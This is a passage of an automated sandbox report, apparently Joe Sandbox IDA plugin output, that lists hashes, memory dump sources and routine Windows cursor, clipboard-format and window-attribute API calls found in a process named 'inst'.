                                                                                                                                                                                                                      • API String ID: 1213607936-0
                                                                                                                                                                                                                      • Opcode ID: e05b19c3880d860e9683435e4b8a358434e883640e8787dd298266084dabc22e
                                                                                                                                                                                                                      • Instruction ID: f61bb6b05c894f48469633ff0ccaf9d9df6cb5ced0daea9c3d846a974f7aa818
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e05b19c3880d860e9683435e4b8a358434e883640e8787dd298266084dabc22e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29113675601109FFDF058F94CE459DE3BA9EF0A388B004594F914A7320D7329A25EBB8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C640CE7
                                                                                                                                                                                                                        • Part of subcall function 6C640A41: __EH_prolog3.LIBCMT ref: 6C640A48
                                                                                                                                                                                                                      • LoadCursorW.USER32 ref: 6C640DAD
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 6C640DB6
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 6C640DBF
                                                                                                                                                                                                                        • Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CF96
                                                                                                                                                                                                                        • Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CFA3
                                                                                                                                                                                                                        • Part of subcall function 6C63CF81: DestroyCursor.USER32(?), ref: 6C63CFB0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$DestroyLoad$H_prolog3
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 316482430-0
                                                                                                                                                                                                                      • Opcode ID: 17415f71f64a451d11eeaf8acf90b54af9733c7f8774804006d7c004398c4add
                                                                                                                                                                                                                      • Instruction ID: 8e08a887b0c242bc8908c433d16eb2521f36325c30baafff340ea2b9336f0e5f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17415f71f64a451d11eeaf8acf90b54af9733c7f8774804006d7c004398c4add
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE2108B0905B449ED3609F7A88857DAFAE4BF59304F80896ED1EE87341CBB42544CB99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(WM_HANDLE_ANIMATION_SNAPSHOT), ref: 6C652C41
                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000002,00000000,00080000,00000000), ref: 6C652CB1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • WM_HANDLE_ANIMATION_SNAPSHOT, xrefs: 6C652C3C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesClipboardFormatLayeredRegisterWindow
                                                                                                                                                                                                                      • String ID: WM_HANDLE_ANIMATION_SNAPSHOT
                                                                                                                                                                                                                      • API String ID: 2623644469-593847780
                                                                                                                                                                                                                      • Opcode ID: 30006d20d78cefa69122acef9ace707667c8b8893dc81a64ad48e0ada9aaf0da
                                                                                                                                                                                                                      • Instruction ID: 2304dfdd95702b89face36ce390e5ee605ac5fd5113f342d6a8b1f35df9a0c6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30006d20d78cefa69122acef9ace707667c8b8893dc81a64ad48e0ada9aaf0da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DF0EDF2700200EFDF04AF59D9C9B99BBB4EB8576BF60402AF0028A542DB301C209B48